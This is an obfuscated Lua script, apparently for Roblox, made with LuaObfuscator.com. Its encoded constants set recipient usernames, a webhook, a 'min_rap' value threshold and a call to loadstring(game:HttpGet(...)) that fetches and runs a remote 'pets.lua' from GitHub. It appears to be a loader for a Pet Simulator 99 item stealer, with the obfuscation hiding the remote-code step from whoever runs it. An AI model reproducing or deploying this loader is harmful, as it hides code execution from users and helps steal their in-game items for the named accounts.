--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (v76==0) then v77=v5(v70,v19);v19=nil;v76=1;end end else return v70;end end end);local function v20(v31,v32,v33) if v33 then local v71=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((1 + 0) -0)) -(v32-1)) + ((879 -(282 + 595)) -1))) ;return v71-(v71%(620 -(555 + 64))) ;else local v72=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v72 + v72))>=v72) and (928 -(214 + (2350 -(1523 + 114))))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -(957 -(892 + 65)) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (610 -354)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;v35=1 + 0 ;end end end local function v23() local v38=0 + (0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (30800116 -14022900)) + (v41 * (176444 -110908)) + (v40 * (606 -(87 + 263))) + v39 ;end if (v38==((105 + 75) -(67 + 113))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 3 + (1 -0) ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1188 -(1069 + 118) ;local v46=(v20(v44,1487 -(998 + 488) ,45 -25 ) * ((3 -1)^(3 + 3 + 26))) + v43 ;local v47=v20(v44,18 + 3 ,(185 -131) -23 );local v48=((v20(v44,32 + (1747 -(760 + 987)) )==(792 -(368 + 423))) and  -(1 + (1913 -(1789 + 124)))) or (3 -2) ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -0) ;else v47=443 -(416 + 26) ;v45=0 + 0 ;end elseif (v47==(6535 -4488)) then return ((v46==((766 -(745 + 21)) -0)) and (v48 * ((1 + 0 + 0)/(1423 -((1733 -1103) + 793))))) or (v48 * NaN) ;end return v8(v48,v47-(3466 -2443) ) * (v45 + (v46/((3 -1)^(490 -(145 + 293))))) ;end local function v25(v49) local v50=1413 -(447 + 966) ;local v51;local v52;while true do if ((5 -(379 -(85 + 291)))==v50) then v52={};for v78=3 -2 , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=1 + 2 ;end if (v50==3) then return v6(v52);end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(1055 -(87 + 968))) then return "";end end v50=4 -3 ;end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -((57 -42) -(9 + 5)) );v18=v18 + v49 ;v50=4 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(1456 -(282 + 1174))) then else v54=811 -(569 + 242) ;v55=nil;v53=2 -1 ;end if (v53==(1 + 1)) then v58=nil;v59=nil;v53=1027 -(706 + 318) ;end if (v53~=(3 + 0)) then else v60=nil;v61=nil;v53=4;end if ((1255 -(721 + 530))~=v53) then else while true do if (v54==3) then v61=nil;while true do local v101=1271 -(945 + 326) ;local v102;while true do if (v101~=(0 -0)) then else v102=0;while true do if (v102==(0 + 0)) then local v120=1504 -(363 + 1141) ;while true do if (v120~=(1 + 0)) then else v102=1581 -(1183 + 397) ;break;end if ((0 -0)~=v120) then else if (v55==(703 -(271 + 429))) then local v157=0 + 0 ;local v158;while true do if (v157~=(0 + 0)) then else v158=1500 -(1408 + 92) ;while true do if ((0 + 0)==v158) then for v164=1087 -(461 + 625) ,v23() do v57[v164-(1289 -(993 + 295)) ]=v28();end return v59;end end break;end end end if (1==v55) then local v159=0 -0 ;local v160;while true do if (v159~=(1661 -(1477 + 184))) then else v160=0 + 0 ;while true do if (v160~=(0 + 0)) then else v59={v56,v57,nil,v58};v60=v23();v160=305 -(244 + 60) ;end if ((1 + 0)==v160) then v61={};v55=2;break;end end break;end end end v120=1 + 0 ;end end end if (v102==1) then if (v55~=(0 + 0)) then else local v148=0;local v149;while true do if (v148~=(529 -(406 + 123))) then else v149=1001 -(938 + 63) ;while true do if (v149==(1770 -(1749 + 20))) then v58={};v55=1 + 0 ;break;end if ((1322 -(1249 + 73))~=v149) then else local v161=1125 -(936 + 189) ;while true do if (1~=v161) then else v149=1 + 0 ;break;end if (v161~=(1613 -(1565 + 48))) then else v56={};v57={};v161=1146 -(466 + 679) ;end end end end break;end end end if (v55~=2) then else local v150=0 -0 ;local v151;local v152;while true do if (0==v150) then v151=267 -(176 + 91) ;v152=nil;v150=2 -1 ;end if (v150==(2 -1)) then while true do if (v151==(1900 -(106 + 1794))) then v152=1092 -(975 + 117) ;while true do if (1==v152) then for v166=1 + 0 ,v23() do local v167=0 + 0 ;local v168;local v169;local v170;while true do if ((0 -0)==v167) then v168=0 -0 ;v169=nil;v167=1;end if (v167==1) then v170=nil;while true do if ((114 -(4 + 110))==v168) then v169=584 -(57 + 527) ;v170=nil;v168=1428 -(41 + 1386) ;end if (v168==1) then while true do if ((103 -(17 + 86))~=v169) then else v170=v21();if (v20(v170,3 -2 ,1 + 0 )==0) then local v179=0;local v180;local v181;local v182;local v183;while true do if (v179~=(1019 -(697 + 321))) then else v182=nil;v183=nil;v179=3 -1 ;end if (v179~=(0 -0)) then else v180=0 -0 ;v181=nil;v179=167 -(122 + 44) ;end if (v179~=(2 -0)) then else while true do if (v180==(9 -6)) then if (v20(v182,3,3)==1) then v183[4]=v61[v183[4 + 0 ]];end v56[v166]=v183;break;end if (v180~=(1 + 1)) then else if (v20(v182,1 -0 ,66 -(30 + 35) )~=(1 + 0)) then else v183[1259 -(1043 + 214) ]=v61[v183[7 -5 ]];end if (v20(v182,1214 -(323 + 889) ,613 -(602 + 9) )==(2 -1)) then v183[583 -(361 + 219) ]=v61[v183[3]];end v180=3;end if (v180~=(321 -(53 + 267))) then else local v186=872 -(826 + 46) ;while true do if (v186==(0 + 0)) then v183={v22(),v22(),nil,nil};if (v181==(1898 -(260 + 1638))) then local v195=982 -(18 + 964) ;local v196;while true do if (v195==(0 -0)) then v196=0;while true do if (v196==(0 -0)) then v183[2 + 1 ]=v22();v183[4 + 0 ]=v22();break;end end break;end end elseif (v181==(1 + 0)) then v183[5 -2 ]=v23();elseif (v181==2) then v183[853 -(20 + 830) ]=v23() -((5 -3)^(13 + 3)) ;elseif (v181~=(129 -(116 + 10))) then else local v201=0 + 0 ;local v202;while true do if (v201==(738 -(542 + 196))) then v202=0 -0 ;while true do if (v202==(0 + 0)) then v183[1 + 2 ]=v23() -((216 -(22 + 192))^(699 -(483 + 200))) ;v183[3 + 1 ]=v22();break;end end break;end end end v186=1 + 0 ;end if (v186==(1 -0)) then v180=4 -2 ;break;end end end if (v180==(0 -0)) then local v187=1551 -(1126 + 425) ;while true do if (v187==(563 -(334 + 228))) then v180=406 -(118 + 287) ;break;end if ((0 -0)~=v187) then else local v194=1121 -(118 + 1003) ;while true do if (v194==1) then v187=2 -1 ;break;end if (v194~=(0 + 0)) then else v181=v20(v170,379 -(142 + 235) ,3);v182=v20(v170,4,6 + 0 );v194=1;end end end end end end break;end end end break;end end break;end end break;end end end v55=7 -4 ;break;end if (v152==0) then local v162=0 -0 ;local v163;while true do if (v162~=(0 + 0)) then else v163=977 -(553 + 424) ;while true do if (v163==(2 -1)) then v152=1;break;end if (v163~=0) then else for v172=1 -0 ,v60 do local v173=0 + 0 ;local v174;local v175;while true do if ((1 + 0)==v173) then if (v174==(1 + 0)) then v175=v21()~=(0 + 0) ;elseif (v174==2) then v175=v24();elseif (v174==3) then v175=v25();end v61[v172]=v175;break;end if (v173==(0 + 0)) then local v177=0;local v178;while true do if (v177~=0) then else v178=0;while true do if (v178~=(0 + 0)) then else local v184=0 + 0 ;while true do if (v184==(0 -0)) then v174=v21();v175=nil;v184=1;end if (v184~=(1 + 0)) then else v178=2 -1 ;break;end end end if (v178==(2 -1)) then v173=1 -0 ;break;end end break;end end end end end v59[768 -(574 + 191) ]=v21();v163=1;end end break;end end end end break;end end break;end end end break;end end break;end end end break;end if (v54==(1 + 0)) then local v97=0 + 0 ;while true do if (v97==(0 -0)) then v57=nil;v58=nil;v97=754 -(239 + 514) ;end if (v97==(1 + 0)) then v54=1331 -(797 + 532) ;break;end end end if (v54==(0 + 0)) then local v98=0 + 0 ;local v99;while true do if (v98~=(1790 -(573 + 1217))) then else v99=0 -0 ;while true do if (v99~=1) then else v54=1 + 0 ;break;end if (v99==(1202 -(373 + 829))) then local v119=0;while true do if (v119==(1 -0)) then v99=732 -(476 + 255) ;break;end if (v119~=(1130 -(369 + 761))) then else v55=939 -(714 + 225) ;v56=nil;v119=1;end end end end break;end end end if (v54~=2) then else local v100=0 + 0 ;while true do if (1~=v100) then else v54=5 -2 ;break;end if (v100==(0 + 0)) then local v107=0;while true do if (v107~=(1 -0)) then else v100=807 -(118 + 688) ;break;end if (v107~=(48 -(25 + 23))) then else v59=nil;v60=nil;v107=239 -(64 + 174) ;end end end end end end break;end if (v53==1) then v56=nil;v57=nil;v53=1 + 1 ;end end end local function v29(v62,v63,v64) local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...) local v80=v66;local v81=v67;local v82=v68;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=5) then if (v93<=2) then if (v93<=0) then local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==1) then v85=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==0) then v109=v92[2];v110,v111=v83(v90[v109](v13(v90,v109 + 1 ,v92[3])));v108=1;end if (v108==2) then for v153=v109,v85 do v112=v112 + 1 ;v90[v153]=v110[v112];end break;end end elseif (v93==1) then v90[v92[2]]=v64[v92[3]];else v64[v92[3]]=v90[v92[2]];end elseif (v93<=3) then local v113=v92[2];local v114=v90[v92[3]];v90[v113 + 1 ]=v114;v90[v113]=v114[v92[4]];elseif (v93>4) then v90[v92[2]]=v92[3];else v84=v92[3];end elseif (v93<=8) then if (v93<=6) then v90[v92[2]]=v92[3]~=0 ;elseif (v93>7) then local v128;local v129,v130;local v131;local v132;v64[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v64[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v64[v92[3]];v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v131=v90[v92[3]];v90[v132 + 1 ]=v131;v90[v132]=v131[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v129,v130=v83(v90[v132](v13(v90,v132 + 1 ,v92[3])));v85=(v130 + v132) -1 ;v128=0;for v145=v132,v85 do v128=v128 + 1 ;v90[v145]=v129[v128];end v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v90[v132]=v90[v132](v13(v90,v132 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else local v142=v92[2];v90[v142]=v90[v142](v13(v90,v142 + 1 ,v85));end elseif (v93<=9) then v90[v92[2]]();elseif (v93==10) then do return;end elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end v84=v84 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!103O00028O0003083O00557365726E616D65030D3O007177657264736173313332313203093O00557365726E616D6532030A3O00736B79707368696B6F76026O00F03F03073O00576562682O6F6B03113O00796F757220776562682O6F6B206865726503073O0053752O706F7274027O004003073O006D696E5F726170024O0080841E41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F502O392F6D61696E2F706574732E6C7561001D3O0012053O00013O00260B3O000800010001002O043O00080001001205000100033O001202000100023O001205000100053O001202000100043O0012053O00063O00260B3O000F00010006002O043O000F0001001205000100083O001202000100074O000600015O001202000100093O0012053O000A3O00260B3O00010001000A002O043O000100010012050001000C3O0012080001000B3O00122O0001000D3O00122O0002000E3O00202O00020002000F00122O000400106O000200046O00013O00024O00010001000100044O001C0001002O043O000100012O000A3O00017O00",v9(),...);
